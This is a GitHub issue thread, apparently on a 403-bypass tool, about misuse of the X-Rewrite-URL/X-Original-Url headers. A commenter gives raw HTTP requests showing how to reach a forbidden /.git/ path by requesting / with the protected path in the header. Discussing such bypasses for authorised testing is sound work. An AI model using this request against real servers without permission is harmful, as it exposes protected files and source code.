X-Original-Url / X-Rewrite-Url bypass #4

rumiljonov · 2020-11-25T11:06:46Z

Hey, I think you are using X-Original-Url / X-Rewrite-Url vector in a wrong way. These headers usually help to bypass front server rules, which are based on URI, but you don't change URI while using these headers.

First, normal request returns 403:

GET /.git/ HTTP/1.1
Host: example.com

This attempt to bypass will return 403 too, because URI hasn't changed and the rule still applies:

GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

This one should bypass the restriction:

GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

The text was updated successfully, but these errors were encountered:

sting8k · 2020-11-26T03:26:05Z

Thank you, fixed in new update.

abdulx01 · 2022-02-05T14:22:44Z

Hy, I also check this method: but it's home page in code response

ler-exploit · 2022-10-11T21:58:24Z

Hy, je vérifie aussi cette méthode: mais c'est la page d'accueil en réponse de code

i have the same problem, did you fix it??

sting8k added a commit that referenced this issue Nov 26, 2020

fix issue #4

2026a39

sting8k closed this as completed Nov 26, 2020

sting8k added a commit that referenced this issue Nov 26, 2020

fix issue #4

d0efa97

Sakuragi-Hanamichii mentioned this issue Jul 9, 2024

you have a mistake in one of your methods iamj0ker/bypass-403#22

Open

SkinAir mentioned this issue Sep 6, 2024

issues 4 has not been updated！ #14

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

X-Original-Url / X-Rewrite-Url bypass #4

X-Original-Url / X-Rewrite-Url bypass #4

rumiljonov commented Nov 25, 2020

sting8k commented Nov 26, 2020

abdulx01 commented Feb 5, 2022

ler-exploit commented Oct 11, 2022

X-Original-Url / X-Rewrite-Url bypass #4

X-Original-Url / X-Rewrite-Url bypass #4

Comments

rumiljonov commented Nov 25, 2020

sting8k commented Nov 26, 2020

abdulx01 commented Feb 5, 2022

ler-exploit commented Oct 11, 2022